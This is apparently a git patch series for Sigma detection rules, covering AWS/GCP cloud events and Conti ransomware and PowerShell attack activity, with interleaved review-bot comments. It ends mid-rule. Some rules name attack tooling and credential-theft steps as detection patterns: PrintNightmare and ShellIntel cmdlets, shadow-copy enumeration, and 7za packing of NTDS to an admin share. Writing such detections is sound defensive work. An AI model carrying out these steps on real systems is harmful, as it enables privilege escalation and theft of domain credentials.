diff --git a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml @@ -0,0 +1 @@ + From 5f2160c1b2bf792c97435b6c50ae486b51a34815 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:32:12 -0500 Subject: [PATCH 0363/1367] Delete aws_s3_control_modified_or_deleted.yml --- rules/cloud/aws/aws_s3_control_modified_or_deleted.yml | 1 - 1 file changed, 1 deletion(-) delete mode 100644 rules/cloud/aws/aws_s3_control_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml b/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_s3_control_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From 532f9129917f0e0e967edf5efd0fc965f3ae2f50 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:28 -0500 Subject: [PATCH 0364/1367] Create aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml @@ -0,0 +1 @@ + From d6bbdf2750d69529468fa1615033a97d3888c6da Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:35 -0500 Subject: [PATCH 0365/1367] Delete aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 - 1 file changed, 1 deletion(-) delete mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml 
diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From cfb6f4e4fb7129dabf139cdc851db349f2e48b0e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:33:44 -0500 Subject: [PATCH 0366/1367] Create aws_eks_cluster_modified_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml @@ -0,0 +1 @@ + From 3d332b81712b6af63204aeddba6f201ebe6ef867 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:37:08 -0500 Subject: [PATCH 0367/1367] Create gcp_vpn_tunnel_modified_or_deleted.yml --- rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml new file mode 100644 index 00000000..139597f9 --- /dev/null +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -0,0 +1,2 @@ + + From db7d2958d31b3329978b423bf7ae34530d4d26f9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:04:24 -0500 Subject: [PATCH 0368/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- ...fs_fileshare_mount_modified_or_deleted.yml | 21 ++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) 
diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
index 8b137891..fee2a025 100644
--- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
+++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
@@ -1 +1,20 @@
-
+title: AWS EFS Fileshare Mount Modified or Deleted
+id: 6a7ba45c-63d8-473e-9736-2eaabff79964
+status: experimental
+description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.
+author: austin Songer @austinsonger
+date: 2021/08/15
+references:
+ - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
+logsource:
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: elasticfilesystem.amazonaws.com
+ eventName: DeleteMountTarget
+ condition: selection
+falsepositives:
+ - unknown
+level: medium
+tags:
+ - attack.impact
From b5766f88048cef8dad2bd349c00acfdbe948b7df Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 15 Aug 2021 15:36:34 -0500
Subject: [PATCH 0369/1367] Update aws_efs_fileshare_modified_or_deleted.yml
---
 .../aws_efs_fileshare_modified_or_deleted.yml | 21 ++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)
diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
index 8b137891..ea53d709 100644
--- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
+++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
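Review bot: The selection in the new aws_efs_fileshare_mount_modified_or_deleted.yml matches only `eventName: DeleteMountTarget`, yet the title and description claim to cover modification too, so a modified mount target never fires this rule; either narrow the title to deletion or extend the selection, e.g. `eventName:` / `- DeleteMountTarget` / `- ModifyMountTargetSecurityGroups`. The same gap exists in aws_efs_fileshare_modified_or_deleted.yml in the next patch (0369), which matches only `DeleteFileSystem` while `UpdateFileSystem` goes unwatched. `tags` carries only the tactic `attack.impact`; a technique id (T1485 or T1489 look like the closest fits, confirm before tagging) would make the mapping actionable. Minor wording: `a EFS` should be `an EFS`.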
@@ -1 +1,20 @@
-
+title: AWS EFS Fileshare Modified or Deleted
+id: 6a7ba45c-63d8-473e-9736-2eaabff79964
+status: experimental
+description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare.
+author: austin Songer @austinsonger
+date: 2021/08/15
+references:
+ - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
+logsource:
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: elasticfilesystem.amazonaws.com
+ eventName: DeleteFileSystem
+ condition: selection
+falsepositives:
+ - unknown
+level: medium
+tags:
+ - attack.impact
From 28f6cbe2b8ccef4bf6113b112b0c5150463a4dc1 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 15 Aug 2021 15:37:07 -0500
Subject: [PATCH 0370/1367] Update aws_efs_fileshare_modified_or_deleted.yml
---
 rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
index ea53d709..dea41ce3 100644
--- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
+++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml
@@ -1,11 +1,11 @@ title: AWS EFS Fileshare Modified or Deleted -id: 6a7ba45c-63d8-473e-9736-2eaabff79964 +id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare. author: austin Songer @austinsonger date: 2021/08/15 references: - - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html logsource: service: cloudtrail detection: From dae3d3b446c9f847518e851a723ccac38d4cc0d6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:42:15 -0500 Subject: [PATCH 0371/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- ...lp_re-identifies_sensitive_information.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 8b137891..6263e3ac 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1 +1,21 @@ +title: Google Cloud Re-identifies Sensitive Information. +id: 234f9f48-904b-4736-a34c-55d23919e4b7 +description: Identifies when sensitive information is re-identifies in google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - projects.content.reidentify + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unkown From a37ec60f768f78a03c4cdeb07cc19b23a81be081 Mon Sep 17 00:00:00 2001 
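Review bot: The new gcp_dlp_re-identifies_sensitive_information.yml (last hunk on this line) lists `- Unkown` under falsepositives, a typo for `- Unknown`; the same typo appears in gcp_dns_zone_modified_or_deleted.yml created in patch 0374 two lines down. The title ends with a period, `title: Google Cloud Re-identifies Sensitive Information.`, which no other rule title on this page has and which propagates into alert names, so drop it. In the description, `google Cloud` should read `Google Cloud`.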
From: Austin Songer Date: Sun, 15 Aug 2021 15:44:20 -0500 Subject: [PATCH 0372/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 6263e3ac..b38d39ae 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,7 +1,7 @@ title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 -description: Identifies when sensitive information is re-identifies in google Cloud. +description: Identifies when sensitive information is re-identified in google Cloud. author: Austin Songer status: experimental date: 2021/08/15 From 3c770c6e4d685da339c0e08445c85a5c087b5c93 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:55:46 -0500 Subject: [PATCH 0373/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index b38d39ae..4cebb946 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,4 +1,3 @@ - title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 description: Identifies when sensitive information is re-identified in google Cloud. From e4314aa4b8ca93ada9970f1843e867cd4c3c581c Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sun, 15 Aug 2021 16:01:10 -0500 Subject: [PATCH 0374/1367] Update gcp_dns_zone_modified_or_deleted.yml --- .../gcp/gcp_dns_zone_modified_or_deleted.yml | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index 8b137891..519352c8 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -1 +1,22 @@ - +title: Google Cloud DNS Zone Modified or Deleted +id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 +description: Identifies when a DNS Zone is modified or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dns/docs/reference/v1/managedZones +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - Dns.ManagedZones.Delete + - Dns.ManagedZones.Update + - Dns.ManagedZones.Patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unkown From 219be99847037bd389f6e80b7745945e622efdcb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 16:02:04 -0500 Subject: [PATCH 0375/1367] Update gcp_dns_zone_modified_or_deleted.yml --- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index 519352c8..cbd76394 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud DNS Zone Modified or Deleted id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 description: Identifies when a DNS Zone is modified or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/15 references: 
From 85dc62070ba01e2c74a7f077f970038aa3760f23 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 16:02:12 -0500 Subject: [PATCH 0376/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 4cebb946..54688a52 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,7 +1,7 @@ title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 description: Identifies when sensitive information is re-identified in google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/15 references: From ebf2b7a313cd3e92db134196ae0a4bec72d66153 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:49:01 -0500 Subject: [PATCH 0377/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml index dea41ce3..0b675c18 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental -description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare. +description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. author: austin Songer @austinsonger date: 2021/08/15 references: From 5a22d07392efb1ab241dc16b6e0ed6695a5728ba Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:52:41 -0500 Subject: [PATCH 0378/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml index 0b675c18..cd4b6d12 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -2,7 +2,7 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. -author: austin Songer @austinsonger +author: Austin Songer @austinsonger date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html From fb117d57147cd21eaf41c3ad1890eb4dcea5d955 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sun, 15 Aug 2021 22:52:53 -0500 Subject: [PATCH 0379/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index fee2a025..cd86285f 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -2,7 +2,7 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 status: experimental description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. -author: austin Songer @austinsonger +author: Austin Songer @austinsonger date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html From 2524adc6ca55811dd1e2cce240f455a5673439c9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:54:11 -0500 Subject: [PATCH 0380/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index cd86285f..b7bcf6e1 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 status: experimental -description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. +description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. author: Austin Songer @austinsonger date: 2021/08/15 references: From ae12f1f32800e0d61feb22f34ae609389749161f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:57:54 -0500 Subject: [PATCH 0381/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 54688a52..97b4a3aa 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -16,5 +16,6 @@ detection: level: medium tags: - attack.impact + - attack.t1565 falsepositives: - Unkown From 37b8040e7666d055287f24ea22c77a5b45e02a6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:28:40 +0200 Subject: [PATCH 0382/1367] cleanup gcp_dlp_re-identifies_sensitive_information Remove list with only 1 value --- .../cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 97b4a3aa..3ba671a0 100644 
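Review bot: The rewritten description in the first hunk on this line is a sentence fragment: `An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.` has no main verb, and the wording it replaces was grammatical. Suggest `+description: Detects when an EFS Fileshare Mount is modified or deleted. An adversary deleting the mount target breaks any file system using it, which might disrupt instances or applications relying on those mounts.`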
--- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -10,8 +10,7 @@ logsource: service: gcp.audit detection: selection: - gcp.audit.method_name: - - projects.content.reidentify + gcp.audit.method_name: projects.content.reidentify condition: selection level: medium tags: From d2a35edae9c4d44ac2c9f53b5fa1a0e23923edd3 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 16 Aug 2021 08:42:17 +0200 Subject: [PATCH 0383/1367] fix: Remove powershell_alternate_hosts from PR Remove a rule using Host Application (which may or may not exist, based on the log parser) from the PR. A future PR will clean up rules using Host Application. --- .../powershell/powershell_alternate_powershell_hosts.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 8eec258c..dcf6fb16 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -19,7 +19,10 @@ falsepositives: level: medium detection: filter: - ContextInfo: 'powershell.exe' + - ContextInfo: 'powershell.exe' + - Message: 'powershell.exe' + # Both fields contain key=value pairs where the key HostApplication is relevant but + # can't be referred directly as event field. condition: selection and not filter --- From 5b60e0ea5ab8e1dc56fe371f4be3bc48f9592c0b Mon Sep 17 00:00:00 2001 
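Review bot: The two new filter entries `- ContextInfo: 'powershell.exe'` and `- Message: 'powershell.exe'` in powershell_alternate_powershell_hosts.yml are exact-value matches, but the comment added right below them says both fields hold key=value pairs, so a field equal to the bare string `powershell.exe` should never occur; unless the target backend treats these fields as free text, the filter is a no-op and `selection and not filter` fires on the legitimate powershell.exe host as well. If substring matching is intended, say so with the modifier: `- ContextInfo|contains: 'powershell.exe'` and `- Message|contains: 'powershell.exe'`. The commit message says the rule is removed from the PR, but the hunk edits it; the message should describe what actually changed. The `selection` the condition refers to lies outside the hunk.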
From: Max Altgelt
Date: Mon, 16 Aug 2021 09:10:05 +0200
Subject: [PATCH 0384/1367] feat: Add some rules to detect Conti behaviour Add rules based on the leaks from the Conti group to detect malicious behaviour.
---
 .../powershell_invoke_nightmare.yml | 21 +++++++++++++++
 ...shell_shellintel_malicious_commandlets.yml | 27 +++++++++++++++++++
 .../process_creation/win_malware_conti.yml | 24 +++++++++++++++++
 .../win_malware_conti_7zip.yml | 20 ++++++++++++++
 .../win_malware_conti_shadowcopy.yml | 25 +++++++++++++++++
 .../win_susp_cmd_shadowcopy_access.yml | 19 +++++++++++++
 6 files changed, 136 insertions(+)
 create mode 100644 rules/windows/powershell/powershell_invoke_nightmare.yml
 create mode 100644 rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml
 create mode 100644 rules/windows/process_creation/win_malware_conti.yml
 create mode 100644 rules/windows/process_creation/win_malware_conti_7zip.yml
 create mode 100644 rules/windows/process_creation/win_malware_conti_shadowcopy.yml
 create mode 100644 rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml
diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml
new file mode 100644
index 00000000..790778af
--- /dev/null
+++ b/rules/windows/powershell/powershell_invoke_nightmare.yml
@@ -0,0 +1,21 @@
+title: PrintNightmare Powershell Exploitation
+id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf
+status: experimental
+description: Detects Commandlet name for PrintNightmare exploitation.
+date: 2021/08/09
+references:
+ - https://github.com/calebstewart/CVE-2021-1675
+author: Max Altgelt, Tobias Michalski
+logsource:
+ product: windows
+ service: powershell
+ definition: It is recommended to use the new "Script Block Logging" of PowerShell v5.
+detection:
+ selection:
+ EventID: 4104
+ ScriptBlockText:
+ - Invoke-Nightmare
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
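Review bot: powershell_invoke_nightmare.yml has no `tags` block, while the sibling powershell_shellintel_malicious_commandlets.yml in the same commit maps to `attack.execution` and `attack.t1059.001`; the same two tags apply here, and since the reference is a CVE-2021-1675 exploit a privilege-escalation tactic tag is probably warranted as well (confirm the technique id before adding it). The description, `Detects Commandlet name for PrintNightmare exploitation.`, could tell the analyst what actually fires, e.g. `description: Detects the Invoke-Nightmare cmdlet name, used by public PrintNightmare (CVE-2021-1675) exploit scripts, in PowerShell script block logs.`.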
diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml
new file mode 100644
index 00000000..e65c3c23
--- /dev/null
+++ b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml
@@ -0,0 +1,27 @@
+title: Malicious ShellIntel PowerShell Commandlets
+id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7
+status: experimental
+description: Detects Commandlet names from ShellIntel exploitation scripts.
+date: 2021/08/09
+references:
+ - https://github.com/Shellntel/scripts/
+tags:
+ - attack.execution
+ - attack.t1059.001
+author: Max Altgelt, Tobias Michalski
+logsource:
+ product: windows
+ service: powershell
+ definition: It is recommended to use the new "Script Block Logging" of PowerShell v5.
+detection:
+ selection:
+ EventID: 4104
+ ScriptBlockText:
+ - Invoke-SMBAutoBrute
+ - Invoke-GPOLinks
+ - Out-Minidump
+ - Invoke-Potato
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml
new file mode 100644
index 00000000..7e3e32d4
--- /dev/null
+++ b/rules/windows/process_creation/win_malware_conti.yml
@@ -0,0 +1,24 @@
+title: Conti Volume Shadow Listing
+id: 7b30e0a7-c675-4b24-8a46-82fa67e2433d
+description: Detects a command used by conti to find volume shadow backups
+author: Max Altgelt, Tobias Michalski
+date: 2021/08/09
+status: experimental
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains|all:
+ - 'vssadmin list shadows'
+ - 'log.txt'
+ condition: 1 of them
+fields:
+ - User
+ - CommandLine
+ - ParentImage
+falsepositives:
+ - Unknown
+level: high
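Review bot: win_malware_conti.yml (second hunk on this line) has no `tags` block, so it ships without an ATT&CK mapping; the same is true of the three Conti rules on the next two lines (win_malware_conti_7zip.yml, win_malware_conti_shadowcopy.yml, win_susp_cmd_shadowcopy_access.yml), whereas the shellintel rule in this very commit is mapped. Shadow-copy enumeration and access is usually mapped to `attack.t1490` when it precedes deletion, or to credential access (T1003.003) when NTDS.dit is pulled from the copy; pick per rule from the leaked playbook the reference points to and add a `tags:` block. Without tags these rules are invisible to any coverage dashboard built on the ATT&CK mapping.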
diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml
new file mode 100644
index 00000000..4023e89b
--- /dev/null
+++ b/rules/windows/process_creation/win_malware_conti_7zip.yml
@@ -0,0 +1,20 @@
+title: Conti Volume Shadow Listing
+id: aa92fd02-09f2-48b0-8a93-864813fb8f41
+description: Detects a command used by conti to exfiltrate NTDS
+author: Max Altgelt, Tobias Michalski
+date: 2021/08/09
+status: experimental
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_1:
+ CommandLine|contains|all:
+ - '7za.exe'
+ - '\\C$\\temp\\log.zip'
+ condition: all of them
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml
new file mode 100644
index 00000000..babdb8d3
--- /dev/null
+++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml
@@ -0,0 +1,25 @@
+title: Conti Volume Shadow Listing
+id: c73124a7-3e89-44a3-bdc1-25fe4df754b1
+description: Detects a command used by conti to access volume shadow backups
+author: Max Altgelt, Tobias Michalski
+date: 2021/08/09
+status: experimental
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_1:
+ CommandLine|contains:
+ - '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'
+ selection_2:
